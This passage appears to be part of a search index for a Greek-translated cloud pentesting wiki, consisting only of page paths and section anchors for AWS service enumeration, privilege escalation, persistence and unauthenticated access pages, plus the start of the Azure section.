-security/aws-services/eventbridgescheduler-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#privesc","pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#aws---kinesis-data-firehose-enum","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#kinesis-data-firehose","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#Μετά-την-εκμετάλλευση--Παράκαμψη-Άμυνας","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehosedeletedeliverystream","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehoseupdatedestination","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#firehoseputrecord--firehoseputrecordbatch","pentesting-cloud/aws-security/aws-services/aws-kinesis-data-firehose-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#aws---iam-identity-center--sso-enum","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Δικαιώματα-brute-force","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Μη-Αυθεντικοποιημένη-Πρόσβαση","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Κλιμάκωση-Δικαιωμάτων","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-Μετά-την-Εκμετάλλευση","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-Επιμονή","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#iam-identity-center","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Σύνδεση-μέσω-sso-με-cli","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Αριθμητική","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Τοπική-Αρίθμηση","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Μη-Αυθεντικοποιημένη-Πρόσβαση-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Κλιμάκωση-Δικαιωμάτων-1","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/aws-security/aws-services/aws-iam-enum.html#Επιμονή","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#aws---kms-enum","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#kms---Υπηρεσία-Διαχείρισης-Κλειδιών","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#Πολιτικές-Κλειδιών","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#Διαχειριστές-Κλειδιών","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#Περιστροφή-cmks","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#Άλλες-σχετικές-πληροφορίες-kms","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#Αριθμητική","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-kms-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#aws---lambda-enum","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-aliases-weights","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#resource-policies","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-database-proxies","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-efs-filesystems","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-layers","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#lambda-extensions","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Εκτέλεση-ενός-lambda","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Μη-Αυθεντική-Πρόσβαση","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Επιμονή","pentesting-cloud/aws-security/aws-services/aws-lambda-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#aws---lightsail-enum","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#aws---lightsail","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#Ανάλυση-Στιγμιότυπων","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#Μεταδεδομένα","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.html#Επιμονή","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---mq-enum","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#amazon-mq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#Εισαγωγή-στους-Μεσολαβητές-Μηνυμάτων","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---rabbitmq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#aws---activemq","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-mq-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#aws---msk-enum","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#amazon-msk","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#Τύποι","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#Πρόσβαση-iam-kafka-σε-serverless","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-msk-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#aws---organizations-enum","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#Βασικές-Πληροφορίες","pentesting-cloud/aws-security/aws-services/aws-organizations-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#aws---redshift-enum","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#amazon-redshift","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#kms","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#cloudhsm","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-redshift-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#aws---relational-database-rds-enum","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#credentials","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#authentication","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#public-access--vpc","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#encryption","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#Μη-Αυθεντικοποιημένη-Πρόσβαση","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#privilege-escalation","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#Επιμονή","pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.html#sql-injection","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#aws---route53-enum","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#route-53","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#ip-based-routing","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-route53-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#aws---secrets-manager-enum","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#aws-secrets-manager","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#aws---ses-enum","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#basic-information","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#smtp-user","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-ses-enum.html#Μετά-την-Εκμετάλλευση","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#aws---sns-enum","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#sns","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#Διαφορά-με-sqs","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#Αριθμητική","pentesting-cloud/aws-security/aws-services/aws-sns-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#aws---sqs-enum","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#sqs","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#aws---s3-athena--glacier-enum","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#Έκδοση-bucket-και-διαγραφή-με-βάση-το-mfa","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-access-logs","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-presigned-urls","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-Μηχανισμοί-Κρυπτογράφησης","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#Αριθμητική","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#dual-stack","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#unauthenticated-access","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-post-exploitation","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#other-s3-vulns","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#s3-http-cache-poisoning-issue","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#amazon-athena","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#aws---step-functions-enum","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#step-functions","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#key-concepts","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#standard-vs-express-workflows","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#states","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#task","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#Επιλογή","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#ΑποτυχίαΕπιτυχία","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#pass","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#wait","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#parallel","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#Χάρτης","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#Εκδόσεις-και-ψευδώνυμα","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#iam-Ρόλοι-για-Μηχανές-Καταστάσεων","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#Αρίθμηση","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#aws---sts-enum","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#sts","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#assume-role-impersonation","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#enumeration","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#privesc","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#post-exploitation","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#persistence","pentesting-cloud/aws-security/aws-services/aws-sts-enum.html#references","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#aws---Άλλες-Υπηρεσίες-enum","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#directconnect","pentesting-cloud/aws-security/aws-services/aws-other-services-enum.html#Υποστήριξη","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#aws---Μη-Αυθεντικοποιημένη-enum--Πρόσβαση","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#Διαρροές-Διαπιστευτηρίων-aws","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#Μη-Αυθεντικοποιημένη-enum--Πρόσβαση-aws","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#Επιθέσεις-Διασύνδεσης-Λογαριασμών","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/index.html#Εργαλεία","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#aws---Λίστα-Χωρίς-Αυθεντικοποίηση-Λογαριασμών","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#Αναγνωριστικά-Λογαριασμών","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#Βίαιη-Δοκιμή","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#osint","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#marketplace","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#snapshots","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#errors","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.html#references","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#aws---api-gateway-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#api-invoke-bypass","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#iam-policy-injection","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#Δημόσιο-πρότυπο-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.html#Πάρε-το-id-λογαριασμού-από-το-δημόσιο-url-του-api-gateway","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.html#aws---cloudfront-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.html#Δημόσιο-πρότυπο-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#aws---cognito-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#unauthenticated-cognito","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#identity-pool-id","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#user-pool-id","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.html#pacu-modules-for-pentesting-and-enumeration","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#aws---codebuild-unauthenticated-access","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#codebuild","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#buildspecyml","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.html#self-hosted-github-actions-runners-in-aws-codebuild","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.html#aws---documentdb-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.html#Δημόσιο-πρότυπο-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.html#aws---dynamodb-Μη-Αυθεντική-Πρόσβαση","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.html#dynamo-db","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#aws---ec2-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#ec2--related-services","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#Δημόσιες-Θύρες","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#Δημόσιες-amis--ebs-snapshots","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.html#Καταμέτρηση-ec2-instances-με-δημόσια-ip","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#aws---ecr-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#ecr","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#Δημόσιες-αποθήκες-μητρώου-εικόνες","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.html#Καταμέτρηση-Ιδιωτικού-Αποθετηρίου","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#aws---ecs-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#ecs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.html#Δημόσια-Προσβάσιμος-Ομάδα-Ασφαλείας-ή-load-balancer-για-Υπηρεσίες-ecs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#aws---elastic-beanstalk-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#elastic-beanstalk","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#web-vulnerability","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#insecure-security-group-rules","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#publicly-accessible-load-balancer","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#publicly-accessible-s3-buckets","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.html#enumerate-public-environments","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.html#aws---elasticsearch-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.html#Δημόσιο-πρότυπο-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#aws---iam--sts-Μη-Αυθεντική-Καταμέτρηση","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#Καταμέτρηση-Ρόλων--Ονομάτων-Χρηστών-σε-έναν-λογαριασμό","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#Ανάληψη-Ρόλου-με-Βία","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#Πολιτικές-Εμπιστοσύνης-brute-force-Ρόλοι-και-χρήστες-Διαφορετικών-Λογαριασμών","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#privesc","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#Ομοσπονδία-oidc-Τρίτων","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#aws---identity-center--sso-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#aws-device-code-phishing","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#attack","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#phishing-του-μη-phishing-mfa","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#Αυτόματα-Εργαλεία","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.html#Αναφορές","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.html#aws---iot-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.html#Δημόσιο-πρότυπο-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.html#aws---kinesis-video-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.html#Δημόσιο-πρότυπο-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#aws---lambda-unauthenticated-access","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#Δημόσιο-url-Λειτουργίας","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#Πρότυπο-Δημόσιου-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.html#Λάβετε-το-id-λογαριασμού-από-δημόσιο-url-lambda","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.html#aws---media-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.html#Δημόσιο-πρότυπο-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#aws---mq-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#Δημόσια-Θύρα","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#rabbitmq","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#activemq","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.html#Δημόσιο-πρότυπο-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#aws---msk-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#Δημόσια-Θύρα","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.html#Δημόσιο-πρότυπο-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#aws---rds-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#rds","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#Δημόσια-Θύρα","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#Δημόσιες-Στιγμιότυπα-rds","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.html#Δημόσιο-πρότυπο-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.html#aws---redshift-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.html#Δημόσιο-πρότυπο-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#aws---sqs-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#sqs","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#Δημόσιο-πρότυπο-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.html#Έλεγχος-Δικαιωμάτων","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#aws---sns-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#sns","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.html#Ανοιχτό-σε-Όλους","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#aws---s3-unauthenticated-enum","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#s3-Δημόσια-Μπακέτα","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Εύρεση-Μπακετών-aws","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Βρείτε-την-Περιοχή","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Αριθμητική-του-κάδου","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Δημόσιο-πρότυπο-url","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Λάβετε-το-id-λογαριασμού-από-δημόσιο-bucket","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Επιβεβαίωση-ότι-ένα-bucket-ανήκει-σε-έναν-λογαριασμό-aws","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Χρησιμοποιούμενα-emails-ως-αρίθμηση-λογαριασμού-root","pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.html#Αναφορές","pentesting-cloud/azure-security/index.html#azure-pentesting","pentesting-cloud/azure-security/index.html#basic-information","pentesting-cloud/azure-security/index.html#azure-pentesterred-team-methodology","pentesting-cloud/azure-security/index.html#external-enum--initial-access","pentesting-cloud/azure-security/index.html#azure--entra-id-tooling","pentesting-cloud/azure-security/index.html#bypass-access-policies","pentesting-cloud/azure-security/index.html#whoami","pentesting-cloud/azure-security/index.html#entra-id-enumeration--privesc","pentesting-cloud/azure-security/index.html#azure-enumeration","pentesting-cloud/azure-security/index.html#Κλιμάκωση-Δικαιωμάτων-Μετά-Εκμετάλλευση--Διαρκής-Παρουσία","pentesting-cloud/azure-security/az-basic-information/index.html#az---Βασικές-Πληροφορίες","pentesting-cloud/azure-security/az-basic-information/index.html#Ιεραρχία-Οργάνωσης","pentesting-cloud/azure-security/az-basic-information/index.html#Ομάδες-Διαχείρισης","pentesting-cloud/azure-security/az-basic-information/index.html#Συνδρομές-azure","pentesting-cloud/azure-security/az-basic-information/index.html#Ομάδες-Πόρων","pentesting-cloud/azure-security/az-basic-in